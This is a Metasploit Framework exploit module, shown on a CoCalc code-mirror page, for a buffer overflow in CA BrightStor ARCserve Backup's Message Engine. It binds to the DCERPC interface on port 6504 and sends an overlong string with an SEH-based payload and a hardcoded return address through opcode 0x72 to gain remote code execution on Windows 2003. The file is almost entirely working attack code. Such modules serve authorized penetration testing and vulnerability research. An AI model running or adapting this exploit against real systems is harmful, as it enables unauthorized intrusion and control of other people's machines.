Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/brightstor/message_engine_72.rb
19516 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = AverageRanking

8


9
  include Msf::Exploit::Remote::DCERPC

10
  include Msf::Exploit::Remote::Seh

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'CA BrightStor ARCserve Message Engine 0x72 Buffer Overflow',

17
        'Description' => %q{

18
          This module exploits a buffer overflow in Computer Associates BrightStor ARCserve Backup

19
          11.1 - 11.5 SP2. By sending a specially crafted RPC request, an attacker could overflow

20
          the buffer and execute arbitrary code.

21
        },

22
        'Author' => [ 'MC' ],

23
        'License' => MSF_LICENSE,

24
        'References' => [

25
          [ 'OSVDB', '68329'],

26
          [ 'URL', 'http://www.metasploit.com/users/mc' ],

27
        ],

28
        'Privileged' => true,

29
        'DefaultOptions' => {

30
          'EXITFUNC' => 'thread',

31
        },

32
        'Payload' => {

33
          'Space' => 600,

34
          'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e",

35
          'StackAdjustment' => -3500,

36
        },

37
        'Platform' => 'win',

38
        'Targets' => [

39
          [ 'BrightStor ARCserve r11.5/Windows 2003',	{ 'Ret' => 0x2380ceb5 } ],

40
        ],

41
        'DisclosureDate' => '2010-10-04',

42
        'DefaultTarget' => 0,

43
        'Notes' => {

44
          'Reliability' => UNKNOWN_RELIABILITY,

45
          'Stability' => UNKNOWN_STABILITY,

46
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

47
        }

48
      )

49
    )

50


51
    register_options([Opt::RPORT(6504)])

52
  end

53


54
  def exploit

55
    connect

56


57
    handle = dcerpc_handle('506b1890-14c8-11d1-bbc3-00805fa6962e', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']])

58
    print_status("Binding to #{handle} ...")

59


60
    dcerpc_bind(handle)

61
    print_status("Bound to #{handle} ...")

62


63
    sploit = NDR.string(rand_text_english(760) + generate_seh_payload(target.ret) + "\x00") + NDR.long(0)

64


65
    print_status("Trying target #{target.name}...")

66


67
    begin

68
      dcerpc_call(0x72, sploit)

69
    rescue Rex::Proto::DCERPC::Exceptions::NoResponse

70
    end

71


72
    handler

73
    disconnect

74
  end

75


76
end

77
=begin

78
/* opcode: 0x72, address: 0x28E893D0 */

79


80
short   sub_28E893D0 (

81
 [in] handle_t  arg_1,

82
 [in][ref][string] char * arg_2,

83
 [in, out][ref] long * arg_3

84
);

85
=end

86


87